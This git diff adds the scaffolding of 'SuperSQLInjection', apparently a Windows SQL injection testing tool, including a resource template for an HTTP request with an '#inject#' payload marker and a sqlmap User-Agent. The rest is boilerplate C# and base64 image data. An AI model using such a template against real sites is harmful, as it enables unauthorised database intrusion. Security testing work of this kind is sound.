+ AR8BAwH4AR8EAAH/AYMC/wQAAcwEAAEDAv8BBAQAAQMC/wFMBAABAwE8AXkBfAQAAQMBAAEBAfwEAAEB
+ AQABAQcAAQEHAAEBBwABAQcAAQEBAAEBBQABAQEAAQMFAAEBAQABPwUAAQEBAAE9AwABAwEAAQEBAAEN
+ AwABBwHCAYcBAAFBAwABDwL/AQABzwMAAR8I/wHgAQcB8AEPAYABAQHAAQABwAEDAeABBwGAAQEBgAEA
+ AYABAQHAAQMBgAEBAYABAAGAAQEBgAEBAYABAQGAAQABgAEBAYABAQGAAQEBgAMAAYABAQGAAQEBgAEA
+ AQECgAEBAYABAQGAAQABAwHAAYABAQGAAQEBgAMAAYABAQGAAQEBgAMAAYABAQGAAQEBgAEAAYABAQGA
+ AQEBgAEBAYABAAGAAQEBwAEDAYABAQGAAQABwAEDAeABBwGAAQEBgAEAAcABAwHwAQ8C/wGAAQAB8AEP
+ BP8BwAEAAfwBPws=
+
+
+
+ 279, 9
+
+
+ 1218, 14
+
+
+ 157, 52
+
+
+
+
+ iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8
+ YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAAIDSURBVDhPpZLrS5NhGMb3j4SWh0oRQVExD4gonkDpg4hG
+ YKxG6WBogkMZKgPNCEVJFBGdGETEvgwyO9DJE5syZw3PIlPEE9pgBCLZ5XvdMB8Ew8gXbl54nuf63dd9
+ 0OGSnwCahxbPRNPAPMw9Xpg6ZmF46kZZ0xSKzJPIrhpDWsVnpBhGkKx3nAX8Pv7z1zg8OoY/cITdn4fw
+ bf/C0kYAN3Ma/w3gWfZL5kzTKBxjWyK2DftwI9tyMYCZKXbNHaD91bLYJrDXsYbrWfUKwJrPE9M2M1Oc
+ VzOOpHI7Jr376Hi9ogHqFIANO0/MmmmbmSmm9a8ze+I4MrNWAdjtoJgWcx+PSzg166yZZ8xM8XvXDix9
+ c4jIqFYAjoriBV9AhEPv1mH/sonogha0afbZMMZz+yreTGyhpusHwtNNCsA5U1zS4BLxzJIfg299qO32
+ Ir7UJtZfftyATqeT+8o2D8JSjQrAJblrncYL7ZJ2+bfaFnC/1S1NjL3diRat7qrO7wLRP3HjWsojBeCo
+ mDEo5mNjuweFGvjWg2EBhCbpkW78htSHHwRyNdmgAFzPEee2iFkzayy2OLXzT4gr6UdUnlXrullsxxQ+
+ kx0g8BTA3aZlButjSTyjODq/WcQcW/B/Je4OQhLvKQDnzN1mp0nnkvAhR8VuMzNrpm1mpjgkoVwB/v8D
+ TgDQASA1MVpwzwAAAABJRU5ErkJggg==
+
+
+
+
+ iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8
+ YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAAIDSURBVDhPpZLrS5NhGMb3j4SWh0oRQVExD4gonkDpg4hG
+ YKxG6WBogkMZKgPNCEVJFBGdGETEvgwyO9DJE5syZw3PIlPEE9pgBCLZ5XvdMB8Ew8gXbl54nuf63dd9
+ 0OGSnwCahxbPRNPAPMw9Xpg6ZmF46kZZ0xSKzJPIrhpDWsVnpBhGkKx3nAX8Pv7z1zg8OoY/cITdn4fw
+ bf/C0kYAN3Ma/w3gWfZL5kzTKBxjWyK2DftwI9tyMYCZKXbNHaD91bLYJrDXsYbrWfUKwJrPE9M2M1Oc
+ VzOOpHI7Jr376Hi9ogHqFIANO0/MmmmbmSmm9a8ze+I4MrNWAdjtoJgWcx+PSzg166yZZ8xM8XvXDix9
+ c4jIqFYAjoriBV9AhEPv1mH/sonogha0afbZMMZz+yreTGyhpusHwtNNCsA5U1zS4BLxzJIfg299qO32
+ Ir7UJtZfftyATqeT+8o2D8JSjQrAJblrncYL7ZJ2+bfaFnC/1S1NjL3diRat7qrO7wLRP3HjWsojBeCo
+ mDEo5mNjuweFGvjWg2EBhCbpkW78htSHHwRyNdmgAFzPEee2iFkzayy2OLXzT4gr6UdUnlXrullsxxQ+
+ kx0g8BTA3aZlButjSTyjODq/WcQcW/B/Je4OQhLvKQDnzN1mp0nnkvAhR8VuMzNrpm1mpjgkoVwB/v8D
+ TgDQASA1MVpwzwAAAABJRU5ErkJggg==
+
+
+
+
+ iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8
+ YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAAIDSURBVDhPpZLrS5NhGMb3j4SWh0oRQVExD4gonkDpg4hG
+ YKxG6WBogkMZKgPNCEVJFBGdGETEvgwyO9DJE5syZw3PIlPEE9pgBCLZ5XvdMB8Ew8gXbl54nuf63dd9
+ 0OGSnwCahxbPRNPAPMw9Xpg6ZmF46kZZ0xSKzJPIrhpDWsVnpBhGkKx3nAX8Pv7z1zg8OoY/cITdn4fw
+ bf/C0kYAN3Ma/w3gWfZL5kzTKBxjWyK2DftwI9tyMYCZKXbNHaD91bLYJrDXsYbrWfUKwJrPE9M2M1Oc
+ VzOOpHI7Jr376Hi9ogHqFIANO0/MmmmbmSmm9a8ze+I4MrNWAdjtoJgWcx+PSzg166yZZ8xM8XvXDix9
+ c4jIqFYAjoriBV9AhEPv1mH/sonogha0afbZMMZz+yreTGyhpusHwtNNCsA5U1zS4BLxzJIfg299qO32
+ Ir7UJtZfftyATqeT+8o2D8JSjQrAJblrncYL7ZJ2+bfaFnC/1S1NjL3diRat7qrO7wLRP3HjWsojBeCo
+ mDEo5mNjuweFGvjWg2EBhCbpkW78htSHHwRyNdmgAFzPEee2iFkzayy2OLXzT4gr6UdUnlXrullsxxQ+
+ kx0g8BTA3aZlButjSTyjODq/WcQcW/B/Je4OQhLvKQDnzN1mp0nnkvAhR8VuMzNrpm1mpjgkoVwB/v8D
+ TgDQASA1MVpwzwAAAABJRU5ErkJggg==
+
+
+
+ 404, 11
+
+
+ 267, 52
+
+
+
+ AAEAAAD/////AQAAAAAAAAAMAgAAAFdTeXN0ZW0uV2luZG93cy5Gb3JtcywgVmVyc2lvbj00LjAuMC4w
+ LCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkFAQAAACZTeXN0
+ ZW0uV2luZG93cy5Gb3Jtcy5JbWFnZUxpc3RTdHJlYW1lcgEAAAAERGF0YQcCAgAAAAkDAAAADwMAAACq
+ DQAAAk1TRnQBSQFMAgEBBwEAAZgBBQGYAQUBEAEAARABAAT/AQkBAAj/AUIBTQE2AQQGAAE2AQQCAAEo
+ AwABQAMAASADAAEBAQABCAYAAQgYAAGAAgABgAMAAoABAAGAAwABgAEAAYABAAKAAgADwAEAAcAB3AHA
+ AQAB8AHKAaYBAAEzBQABMwEAATMBAAEzAQACMwIAAxYBAAMcAQADIgEAAykBAANVAQADTQEAA0IBAAM5
+ AQABgAF8Af8BAAJQAf8BAAGTAQAB1gEAAf8B7AHMAQABxgHWAe8BAAHWAucBAAGQAakBrQIAAf8BMwMA
+ AWYDAAGZAwABzAIAATMDAAIzAgABMwFmAgABMwGZAgABMwHMAgABMwH/AgABZgMAAWYBMwIAAmYCAAFm
+ AZkCAAFmAcwCAAFmAf8CAAGZAwABmQEzAgABmQFmAgACmQIAAZkBzAIAAZkB/wIAAcwDAAHMATMCAAHM
+ AWYCAAHMAZkCAALMAgABzAH/AgAB/wFmAgAB/wGZAgAB/wHMAQABMwH/AgAB/wEAATMBAAEzAQABZgEA
+ ATMBAAGZAQABMwEAAcwBAAEzAQAB/wEAAf8BMwIAAzMBAAIzAWYBAAIzAZkBAAIzAcwBAAIzAf8BAAEz
+ AWYCAAEzAWYBMwEAATMCZgEAATMBZgGZAQABMwFmAcwBAAEzAWYB/wEAATMBmQIAATMBmQEzAQABMwGZ
+ AWYBAAEzApkBAAEzAZkBzAEAATMBmQH/AQABMwHMAgABMwHMATMBAAEzAcwBZgEAATMBzAGZAQABMwLM
+ AQABMwHMAf8BAAEzAf8BMwEAATMB/wFmAQABMwH/AZkBAAEzAf8BzAEAATMC/wEAAWYDAAFmAQABMwEA
+ AWYBAAFmAQABZgEAAZkBAAFmAQABzAEAAWYBAAH/AQABZgEzAgABZgIzAQABZgEzAWYBAAFmATMBmQEA
+ AWYBMwHMAQABZgEzAf8BAAJmAgACZgEzAQADZgEAAmYBmQEAAmYBzAEAAWYBmQIAAWYBmQEzAQABZgGZ
+ AWYBAAFmApkBAAFmAZkBzAEAAWYBmQH/AQABZgHMAgABZgHMATMBAAFmAcwBmQEAAWYCzAEAAWYBzAH/
+ AQABZgH/AgABZgH/ATMBAAFmAf8BmQEAAWYB/wHMAQABzAEAAf8BAAH/AQABzAEAApkCAAGZATMBmQEA
+ AZkBAAGZAQABmQEAAcwBAAGZAwABmQIzAQABmQEAAWYBAAGZATMBzAEAAZkBAAH/AQABmQFmAgABmQFm
+ ATMBAAGZATMBZgEAAZkBZgGZAQABmQFmAcwBAAGZATMB/wEAApkBMwEAApkBZgEAA5kBAAKZAcwBAAKZ
+ Af8BAAGZAcwCAAGZAcwBMwEAAWYBzAFmAQABmQHMAZkBAAGZAswBAAGZAcwB/wEAAZkB/wIAAZkB/wEz
+ AQABmQHMAWYBAAGZAf8BmQEAAZkB/wHMAQABmQL/AQABzAMAAZkBAAEzAQABzAEAAWYBAAHMAQABmQEA
+ AcwBAAHMAQABmQEzAgABzAIzAQABzAEzAWYBAAHMATMBmQEAAcwBMwHMAQABzAEzAf8BAAHMAWYCAAHM
+ AWYBMwEAAZkCZgEAAcwBZgGZAQABzAFmAcwBAAGZAWYB/wEAAcwBmQIAAcwBmQEzAQABzAGZAWYBAAHM
+ ApkBAAHMAZkBzAEAAcwBmQH/AQACzAIAAswBMwEAAswBZgEAAswBmQEAA8wBAALMAf8BAAHMAf8CAAHM
+ Af8BMwEAAZkB/wFmAQABzAH/AZkBAAHMAf8BzAEAAcwC/wEAAcwBAAEzAQAB/wEAAWYBAAH/AQABmQEA
+ AcwBMwIAAf8CMwEAAf8BMwFmAQAB/wEzAZkBAAH/ATMBzAEAAf8BMwH/AQAB/wFmAgAB/wFmATMBAAHM
+ AmYBAAH/AWYBmQEAAf8BZgHMAQABzAFmAf8BAAH/AZkCAAH/AZkBMwEAAf8BmQFmAQAB/wKZAQAB/wGZ
+ AcwBAAH/AZkB/wEAAf8BzAIAAf8BzAEzAQAB/wHMAWYBAAH/AcwBmQEAAf8CzAEAAf8BzAH/AQAC/wEz
+ AQABzAH/AWYBAAL/AZkBAAL/AcwBAAJmAf8BAAFmAf8BZgEAAWYC/wEAAf8CZgEAAf8BZgH/AQAC/wFm
+ AQABIQEAAaUBAANfAQADdwEAA4YBAAOWAQADywEAA7IBAAPXAQAD3QEAA+MBAAPqAQAD8QEAA/gBAAHw
+ AfsB/wEAAaQCoAEAA4ADAAH/AgAB/wMAAv8BAAH/AwAB/wEAAf8BAAL/AgAD/wEAEP8wAA/vAf8PvAUA
+ AQcBcgFPA0kBcgEHFAAP7wH/D+8EAAGYAU8BUASYAU8BSQEcEwAB7w3/Ae8B/wHvDf8B7wMAAZgBTwF4
+ AQgBmAKXAZgBCAGXAUkBHBIAAe8B/wLcAv8C3AL/AtwC/wHvAf8B7wL/CdwC/wHvAgABBwFPAXgBCAaX
+ AQgBlwFJAQcRAAHvAf8C3AL/AtwC/wLcAv8B7wH/Ae8C/wncAv8B7wIAAXgBVgEIApcBeAEbAZgDlwEI
+ AU8BchEAAe8B/wLcAv8C3AL/AtwC/wHvAf8B7w3/Ae8CAAFQApgBlwF4A/8BmAKXApgBTxEAAe8B/wLc
+ Av8C3AL/AtwC/wHvAf8B7wL/CdwC/wHvAgABTwGYAZcBeAL/AfQC/wGYApcBmAFJEQAB7wH/AtwC/wLc
+ Av8C3AL/Ae8B/wHvAv8J3AL/Ae8CAAFVAQgBeAGXAQgB8QGXAQgC/wGYAZcBmAFPEQAB7w3/Ae8B/wHv
+ Df8B7wIAAVYCmAWXAQgB/wHzApgBTxEAAe8B9AvyAfQB7wH/Ae8B9AvyAfQB7wIAAZgBlwEIBpcBCAGX
+ AQgBUAGXEQABtA2zAbQB/wG0DbMBtAIAAQgBVgF4AQgGlwEIAXgBTwEHEQABswEJC9wBCQGzAf8BswEJ
+ C9wBCQGzAwABmAFWAXgBCAGYAngBmAEIAXgBTwGYEgABswHhC9sB4QGzAf8BswHhC9sB4QGzBAABmAFW
+ AZcEmAGXAVABmBMAAbMN4gGzAf8Bsw3iAbMFAAEIAZgEVgGYAQcUAA+zAf8Bug2zAbohABD/IAABEg5D
+ ARIB/w7UAf8gAAFtDv8BbQH/AdQC3AEZAvQBGQHcAdsB2gHTAdQB2wHUAf8BAA4HAgAIBwaXAQABbQH/
+ ARUEEQEQAxEBEAERARQB/wFtAf8B1ALcARkC9AEZAdwB2wHaAdMB1AHbAdQB/wEAAQcC/wEHBP8BBwT/
+ AQcCAAEHAv8BBwT/AZcECAGXAQABbQH/AeoC/wG8A/8BvAP/AeoB/wFtAf8B1AIZAfQC/wH0ARkBCQPc
+ AQkB1AH/AQABBwL/AQcE/wEHBP8BBwIAAQcC/wEHBP8BlwQIAZcBAAFtAf8B6gG8AQcBvAMHAbwCBwG8
+ AeoB/wFtAf8O1AH/AQAOBwIACAcGlwEAAesB/wFtAv8BvAP/AbwD/wFtAf8B6wH/AdQC3AEZAvQBGQHc
+ AdsB2gHTAdQB2wHUAf8BAAEHAv8BBwT/AQcE/wEHAgABBwL/AQcE/wGXBAgBlwEAAesB/wFtAfAIvAHw
+ AW0B/wHrAf8B1ALcARkC9AEZAdwB2wHaAdMB1AHbAdQB/wEAAQcC/wEHBP8BBwT/AQcCAAEHAv8BBwT/
+ AZcECAGXAQAB6wH/AesC/wHwA/8B8AP/AesB/wHrAf8B1ALcARkC9AEZAdwB2wHaAdMB1AHbAdQB/wEA
+ DgcCAAgHBpcBAAHrAf8B6wIZAfEG8gHzAesB/wHrAf8B1AIZAfQC/wH0ARkBCQPcAQkB1AH/AQABBwL/
+ AQcE/wEHBP8BBwIAAQcC/wEHBP8BlwQIAZcBAAHsAf8BkQElASABGQcCAewB/wHsAf8O1AH/AQABBwL/
+ AQcE/wEHBP8BBwIAAQcC/wEHBP8BlwQIAZcBAAHsAf8BkQImAfQBNAVVATQB7AH/AewB/wHUAtwBGQL0
+ ARkB3AHbAdoB0wHUAdsB1AH/AQAOMwIACDMGNAEAAewB/wHsARkI8wH0AewB/wHsAf8B1ALcARkC9AEZ
+ AdwB2wHaAdMB1AHbAdQB/wEAATMCNAEzATQCVQE0ATMBNAJVATQBMwIAATMCNAEzATQCVQc0AQAB7AH/
+ AewC/wHzA/8B8wP/AewB/wHsAf8B1AIZAfQC/wH0ARkBCQPcAQkB1AH/AQAOMwIACDMGNAEAAewB/wzs
+ Af8B7AH/DtQB/yAAAewO/wHsEP8gABDtAUIBTQE+BwABPgMAASgDAAFAAwABIAMAAQEBAAEBBgABARYA
+ A/8DAAT/BQABAQHwAQ8FAAEBAeABBwUAAQEBwAEDBQABAQGAAQEFAAEBAYABAQUAAQEBgAEBBQABAQGA
+ AQEFAAEBAYABAQUAAQEBgAEBBQABAQGAAQEFAAEBAYABAQUAAQEBwAEDBQABAQHgAQcFAAEBAfABDwUA
+ AQEC/wQABP8EAAT/BAABgAEBAYABAQQAAYABAQGAAQEEAAGAAQEBgAEBBAABgAEBAYABAQQAAYABAQGA
+ AQEEAAGAAQEBgAEBBAABgAEBAYABAQQAAYABAQGAAQEEAAGAAQEBgAEBBAABgAEBAYABAQQAAYABAQGA
+ AQEEAAGAAQEBgAEBBAAE/wQABP8CAAs=
+
+
+
+
+ iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8
+ YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAAIDSURBVDhPpZLrS5NhGMb3j4SWh0oRQVExD4gonkDpg4hG
+ YKxG6WBogkMZKgPNCEVJFBGdGETEvgwyO9DJE5syZw3PIlPEE9pgBCLZ5XvdMB8Ew8gXbl54nuf63dd9
+ 0OGSnwCahxbPRNPAPMw9Xpg6ZmF46kZZ0xSKzJPIrhpDWsVnpBhGkKx3nAX8Pv7z1zg8OoY/cITdn4fw
+ bf/C0kYAN3Ma/w3gWfZL5kzTKBxjWyK2DftwI9tyMYCZKXbNHaD91bLYJrDXsYbrWfUKwJrPE9M2M1Oc
+ VzOOpHI7Jr376Hi9ogHqFIANO0/MmmmbmSmm9a8ze+I4MrNWAdjtoJgWcx+PSzg166yZZ8xM8XvXDix9
+ c4jIqFYAjoriBV9AhEPv1mH/sonogha0afbZMMZz+yreTGyhpusHwtNNCsA5U1zS4BLxzJIfg299qO32
+ Ir7UJtZfftyATqeT+8o2D8JSjQrAJblrncYL7ZJ2+bfaFnC/1S1NjL3diRat7qrO7wLRP3HjWsojBeCo
+ mDEo5mNjuweFGvjWg2EBhCbpkW78htSHHwRyNdmgAFzPEee2iFkzayy2OLXzT4gr6UdUnlXrullsxxQ+
+ kx0g8BTA3aZlButjSTyjODq/WcQcW/B/Je4OQhLvKQDnzN1mp0nnkvAhR8VuMzNrpm1mpjgkoVwB/v8D
+ TgDQASA1MVpwzwAAAABJRU5ErkJggg==
+
+
+
+
+ iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8
+ YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAAIDSURBVDhPpZLrS5NhGMb3j4SWh0oRQVExD4gonkDpg4hG
+ YKxG6WBogkMZKgPNCEVJFBGdGETEvgwyO9DJE5syZw3PIlPEE9pgBCLZ5XvdMB8Ew8gXbl54nuf63dd9
+ 0OGSnwCahxbPRNPAPMw9Xpg6ZmF46kZZ0xSKzJPIrhpDWsVnpBhGkKx3nAX8Pv7z1zg8OoY/cITdn4fw
+ bf/C0kYAN3Ma/w3gWfZL5kzTKBxjWyK2DftwI9tyMYCZKXbNHaD91bLYJrDXsYbrWfUKwJrPE9M2M1Oc
+ VzOOpHI7Jr376Hi9ogHqFIANO0/MmmmbmSmm9a8ze+I4MrNWAdjtoJgWcx+PSzg166yZZ8xM8XvXDix9
+ c4jIqFYAjoriBV9AhEPv1mH/sonogha0afbZMMZz+yreTGyhpusHwtNNCsA5U1zS4BLxzJIfg299qO32
+ Ir7UJtZfftyATqeT+8o2D8JSjQrAJblrncYL7ZJ2+bfaFnC/1S1NjL3diRat7qrO7wLRP3HjWsojBeCo
+ mDEo5mNjuweFGvjWg2EBhCbpkW78htSHHwRyNdmgAFzPEee2iFkzayy2OLXzT4gr6UdUnlXrullsxxQ+
+ kx0g8BTA3aZlButjSTyjODq/WcQcW/B/Je4OQhLvKQDnzN1mp0nnkvAhR8VuMzNrpm1mpjgkoVwB/v8D
+ TgDQASA1MVpwzwAAAABJRU5ErkJggg==
+
+
+
+ 417, 52
+
+
+ 17, 52
+
+
+ GET /access.asp?id=1<sEncode>#inject#<eEncode> HTTP/1.1
+Accept-Language: en-us,en;q=0.5
+Accept-Encoding: gzip,deflate
+Host: 127.0.0.1
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+User-Agent: sqlmap/1.0-dev (http://sqlmap.org)
+Accept-Charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
+Connection: close
+Pragma: no-cache
+Cache-Control: no-cache,no-store
+
+
+ 988, 14
+
+
+ 806, 14
+
+
+ 648, 14
+
+
+ 608, 52
+
+
+ 729, 52
+
+
+ 852, 52
+
+
+ 100
+
+
\ No newline at end of file
diff --git a/SuperSQLInjection/Program.cs b/SuperSQLInjection/Program.cs
new file mode 100644
index 0000000..2f12dc0
--- /dev/null
+++ b/SuperSQLInjection/Program.cs
@@ -0,0 +1,20 @@
+using System;
+using System.Collections.Generic;
+using System.Windows.Forms;
+
+namespace SuperSQLInjection
+{
+ static class Program
+ {
+ ///
+ /// 应用程序的主入口点。
+ ///
+ [STAThread]
+ static void Main()
+ {
+ Application.EnableVisualStyles();
+ Application.SetCompatibleTextRenderingDefault(false);
+ Application.Run(new Main());
+ }
+ }
+}
diff --git a/SuperSQLInjection/ProgressBar.Designer.cs b/SuperSQLInjection/ProgressBar.Designer.cs
new file mode 100644
index 0000000..3eca654
--- /dev/null
+++ b/SuperSQLInjection/ProgressBar.Designer.cs
@@ -0,0 +1,46 @@
+namespace SuperSQLInjection
+{
+ partial class ProgressBar
+ {
+ ///
+ /// Required designer variable.
+ ///
+ private System.ComponentModel.IContainer components = null;
+
+ ///
+ /// Clean up any resources being used.
+ ///
+ /// true if managed resources should be disposed; otherwise, false.
+ protected override void Dispose(bool disposing)
+ {
+ if (disposing && (components != null))
+ {
+ components.Dispose();
+ }
+ base.Dispose(disposing);
+ }
+
+ #region Windows Form Designer generated code
+
+ ///
+ /// Required method for Designer support - do not modify
+ /// the contents of this method with the code editor.
+ ///
+ private void InitializeComponent()
+ {
+ this.SuspendLayout();
+ //
+ // ProgressBar
+ //
+ this.AutoScaleDimensions = new System.Drawing.SizeF(6F, 12F);
+ this.AutoScaleMode = System.Windows.Forms.AutoScaleMode.Font;
+ this.ClientSize = new System.Drawing.Size(487, 146);
+ this.Name = "ProgressBar";
+ this.Text = "ProgressBar";
+ this.ResumeLayout(false);
+
+ }
+
+ #endregion
+ }
+}
\ No newline at end of file
diff --git a/SuperSQLInjection/ProgressBar.cs b/SuperSQLInjection/ProgressBar.cs
new file mode 100644
index 0000000..365dd06
--- /dev/null
+++ b/SuperSQLInjection/ProgressBar.cs
@@ -0,0 +1,19 @@
+using System;
+using System.Collections.Generic;
+using System.ComponentModel;
+using System.Data;
+using System.Drawing;
+using System.Linq;
+using System.Text;
+using System.Windows.Forms;
+
+namespace SuperSQLInjection
+{
+ public partial class ProgressBar : Form
+ {
+ public ProgressBar()
+ {
+ InitializeComponent();
+ }
+ }
+}
diff --git a/SuperSQLInjection/ProgressBar.resx b/SuperSQLInjection/ProgressBar.resx
new file mode 100644
index 0000000..1af7de1
--- /dev/null
+++ b/SuperSQLInjection/ProgressBar.resx
@@ -0,0 +1,120 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ text/microsoft-resx
+
+
+ 2.0
+
+
+ System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
+
+
+ System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
+
+
\ No newline at end of file
diff --git a/SuperSQLInjection/Properties/AssemblyInfo.cs b/SuperSQLInjection/Properties/AssemblyInfo.cs
new file mode 100644
index 0000000..43aed63
--- /dev/null
+++ b/SuperSQLInjection/Properties/AssemblyInfo.cs
@@ -0,0 +1,36 @@
+using System.Reflection;
+using System.Runtime.CompilerServices;
+using System.Runtime.InteropServices;
+
+// 有关程序集的常规信息通过以下
+// 特性集控制。更改这些特性值可修改
+// 与程序集关联的信息。
+[assembly: AssemblyTitle("SuperSQLInjection")]
+[assembly: AssemblyDescription("design by shack2")]
+[assembly: AssemblyConfiguration("")]
+[assembly: AssemblyCompany("www.shack2.org")]
+[assembly: AssemblyProduct("SuperSQLInjection")]
+[assembly: AssemblyCopyright("Copyright © 2014-2016")]
+[assembly: AssemblyTrademark("")]
+[assembly: AssemblyCulture("")]
+
+// 将 ComVisible 设置为 false 使此程序集中的类型
+// 对 COM 组件不可见。如果需要从 COM 访问此程序集中的类型,
+// 则将该类型上的 ComVisible 特性设置为 true。
+[assembly: ComVisible(false)]
+
+// 如果此项目向 COM 公开,则下列 GUID 用于类型库的 ID
+[assembly: Guid("d5688068-fc89-467d-913f-037a785caca7")]
+
+// 程序集的版本信息由下面四个值组成:
+//
+// 主版本
+// 次版本
+// 内部版本号
+// 修订号
+//
+// 可以指定所有这些值,也可以使用“内部版本号”和“修订号”的默认值,
+// 方法是按如下所示使用“*”:
+// [assembly: AssemblyVersion("1.0.*")]
+[assembly: AssemblyVersion("1.2016.05.25")]
+[assembly: AssemblyFileVersion("1.2016.05.25")]
diff --git a/SuperSQLInjection/Properties/Resources.Designer.cs b/SuperSQLInjection/Properties/Resources.Designer.cs
new file mode 100644
index 0000000..29fb78d
--- /dev/null
+++ b/SuperSQLInjection/Properties/Resources.Designer.cs
@@ -0,0 +1,63 @@
+//------------------------------------------------------------------------------
+//
+// 此代码由工具生成。
+// 运行时版本:4.0.30319.42000
+//
+// 对此文件的更改可能会导致不正确的行为,并且如果
+// 重新生成代码,这些更改将会丢失。
+//
+//------------------------------------------------------------------------------
+
+namespace SuperSQLInjection.Properties {
+ using System;
+
+
+ ///
+ /// 一个强类型的资源类,用于查找本地化的字符串等。
+ ///
+ // 此类是由 StronglyTypedResourceBuilder
+ // 类通过类似于 ResGen 或 Visual Studio 的工具自动生成的。
+ // 若要添加或移除成员,请编辑 .ResX 文件,然后重新运行 ResGen
+ // (以 /str 作为命令选项),或重新生成 VS 项目。
+ [global::System.CodeDom.Compiler.GeneratedCodeAttribute("System.Resources.Tools.StronglyTypedResourceBuilder", "4.0.0.0")]
+ [global::System.Diagnostics.DebuggerNonUserCodeAttribute()]
+ [global::System.Runtime.CompilerServices.CompilerGeneratedAttribute()]
+ internal class Resources {
+
+ private static global::System.Resources.ResourceManager resourceMan;
+
+ private static global::System.Globalization.CultureInfo resourceCulture;
+
+ [global::System.Diagnostics.CodeAnalysis.SuppressMessageAttribute("Microsoft.Performance", "CA1811:AvoidUncalledPrivateCode")]
+ internal Resources() {
+ }
+
+ ///
+ /// 返回此类使用的缓存的 ResourceManager 实例。
+ ///
+ [global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)]
+ internal static global::System.Resources.ResourceManager ResourceManager {
+ get {
+ if (object.ReferenceEquals(resourceMan, null)) {
+ global::System.Resources.ResourceManager temp = new global::System.Resources.ResourceManager("SuperSQLInjection.Properties.Resources", typeof(Resources).Assembly);
+ resourceMan = temp;
+ }
+ return resourceMan;
+ }
+ }
+
+ ///
+ /// 使用此强类型资源类,为所有资源查找
+ /// 重写当前线程的 CurrentUICulture 属性。
+ ///
+ [global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)]
+ internal static global::System.Globalization.CultureInfo Culture {
+ get {
+ return resourceCulture;
+ }
+ set {
+ resourceCulture = value;
+ }
+ }
+ }
+}
diff --git a/SuperSQLInjection/Properties/Resources.resx b/SuperSQLInjection/Properties/Resources.resx
new file mode 100644
index 0000000..af7dbeb
--- /dev/null
+++ b/SuperSQLInjection/Properties/Resources.resx
@@ -0,0 +1,117 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ text/microsoft-resx
+
+
+ 2.0
+
+
+ System.Resources.ResXResourceReader, System.Windows.Forms, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
+
+
+ System.Resources.ResXResourceWriter, System.Windows.Forms, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
+
+
\ No newline at end of file
diff --git a/SuperSQLInjection/Properties/Settings.Designer.cs b/SuperSQLInjection/Properties/Settings.Designer.cs
new file mode 100644
index 0000000..d227d01
--- /dev/null
+++ b/SuperSQLInjection/Properties/Settings.Designer.cs
@@ -0,0 +1,26 @@
+//------------------------------------------------------------------------------
+//
+// 此代码由工具生成。
+// 运行时版本:4.0.30319.42000
+//
+// 对此文件的更改可能会导致不正确的行为,并且如果
+// 重新生成代码,这些更改将会丢失。
+//
+//------------------------------------------------------------------------------
+
+namespace SuperSQLInjection.Properties {
+
+
+ [global::System.Runtime.CompilerServices.CompilerGeneratedAttribute()]
+ [global::System.CodeDom.Compiler.GeneratedCodeAttribute("Microsoft.VisualStudio.Editors.SettingsDesigner.SettingsSingleFileGenerator", "14.0.0.0")]
+ internal sealed partial class Settings : global::System.Configuration.ApplicationSettingsBase {
+
+ private static Settings defaultInstance = ((Settings)(global::System.Configuration.ApplicationSettingsBase.Synchronized(new Settings())));
+
+ public static Settings Default {
+ get {
+ return defaultInstance;
+ }
+ }
+ }
+}
diff --git a/SuperSQLInjection/Properties/Settings.settings b/SuperSQLInjection/Properties/Settings.settings
new file mode 100644
index 0000000..3964565
--- /dev/null
+++ b/SuperSQLInjection/Properties/Settings.settings
@@ -0,0 +1,7 @@
+
+
+
+
+
+
+
diff --git a/SuperSQLInjection/Properties/app.manifest b/SuperSQLInjection/Properties/app.manifest
new file mode 100644
index 0000000..6230e10
--- /dev/null
+++ b/SuperSQLInjection/Properties/app.manifest
@@ -0,0 +1,69 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/SuperSQLInjection/SETING~1.RES b/SuperSQLInjection/SETING~1.RES
new file mode 100644
index 0000000..1af7de1
--- /dev/null
+++ b/SuperSQLInjection/SETING~1.RES
@@ -0,0 +1,120 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ text/microsoft-resx
+
+
+ 2.0
+
+
